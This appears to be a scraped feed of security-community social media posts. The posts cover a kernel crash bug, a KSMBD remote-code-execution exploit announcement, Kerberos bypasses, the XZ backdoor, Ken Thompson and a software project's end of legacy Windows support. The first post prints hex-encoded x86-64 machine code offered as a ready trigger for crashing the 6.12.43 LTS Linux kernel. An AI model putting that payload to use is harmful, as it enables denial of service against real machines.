You too can crash today's 6.12.43 LTS kernel thanks to a stable maintainer's AI slop. All you need is CAP_SYS_RESOURCE, modern systemd, and this:
40 b7 40 c1 e7 18 83 ef 08 57 57 31 ff 40 b7 07 31 c0 b0 a0 48 89 e6 0f 05 5e ff ce 31 ff b0 21 0f 05
Look at all this extra space!
The end of an era.
If you donโt know what Tavis (and the P0) has contributed to and changed the vulnerability research community, let me give you just an example: if not because of Tavis and P0, weโd be still waiting 6 or 12 months to get a Windows or Office bug patched.
Say hello to Eternal Tux๐ง, a 0-click RCE exploit against the Linux kernel from KSMBD N-Days (CVE-2023-52440 & CVE-2023-4130)
https://t.co/Cbk9MBo91v
Cheers to @u1f383 for finding these CVEs + the OffensiveCon talk from gteissier & @laomaiweng for inspiration!
No disrespect to Linus Torvalds, but this guy is the greatest geek alive ๐ซก
Created UNIX in 1971 when he was 28 years old.
Created Go in 2009 when he was 66 years old๐ฒ
He also developed the B programming language (which led to C), created UTF-8 encoding (making international text possible online), and designed essential tools like grep that developers still rely on daily.
He also helped with the development of Multics (that led to UNIX), Plan 9 from Bell Labs and Inferno operating systems.
That's 4 operating systems in total... Most people don't even use these many OS.
Pretty impressive resume, right? ๐ฅ
And it's a shame that many people, even the ones in the IT and tech industry, don't know him.
Ken Thompson.... Remember the name ๐
11 years after XP's end-of-life we have decided to completely stop supporting operating systems older than Windows 10.
The project will slowly transition to Visual Studio 2022 and Qt 5.15 with CMake, to make it easier for new people to contribute. Exciting updates are coming!
It seems amazing to me that MS have spent years talking about this feature and have not fixed well known public bypasses. My similar Kerberos trick probably works https://t.co/mzhtPBR94D as does https://t.co/C9uFogNE4B if you accept a prompt :)
๐คฏ The level of sophistication of the XZ attack is very impressive! I tried to make sense of the analysis in a single page (which was quite complicated)!
I hope it helps to make sense of the information out there. Please treat the information "as is" while the analysis progresses! ๐ง #infosec #xz